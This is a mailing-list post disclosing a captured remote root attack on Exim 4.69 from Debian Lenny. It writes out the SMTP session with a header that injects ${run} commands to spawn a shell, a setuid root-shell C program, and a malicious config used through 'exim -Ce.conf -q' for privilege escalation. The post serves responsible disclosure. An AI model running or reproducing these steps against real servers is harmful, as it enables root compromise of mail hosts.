[exim-dev] Remote root vulnerability in Exim

Top Page
Delete this message
Reply to this message
Author: Sergey Kononenko
Date:  
To: exim-dev
CC: pkg-exim4-maintainers
Subject: [exim-dev] Remote root vulnerability in Exim
Hi,

While investigating security break in the network of my company, I've
captured (by tcpdump) sequence of successful remote root attack through
Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
didn't find email of current maintainer of Exim, so I've decided to
write to this mailing lists. I don't want to publish all details of
attack before developers can investigate and fix vulnerability.
So I ask Exim maintainers to contact me and I will send them complete
captured sequence of attack.
Here I can put brief sequence of attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
DATA
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
....
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i <&4 >&0 2>&0'}}........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
..........
about 700000 the same strings
..........
MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
MAILbombMAILb
.
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>

after that attacker gets shell with id of user Debian-exim and cwd
in /var/spool/exim4
then it put file there file setuid with trivial execution of root shell:
int main(int argc, char *argv[])
{
        setuid(0);
        setgid(0);
        setgroups(0, NULL);
        execl("/bin/sh", "sh", NULL);
}


and create another file e.conf with following content:
spool_directory = ${run{/bin/chown
root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

the he runs:
exim -Ce.conf -q

and gets suid bit on /var/spool/exim4/setuid
everything else is trivial.

I haven't reproduced remote part of attack, but escalation from Debian-exim to
root works also at exim4-daemon-light 4.72-2 from Debian Squeeze.

With best regards,
Sergey Kononenko.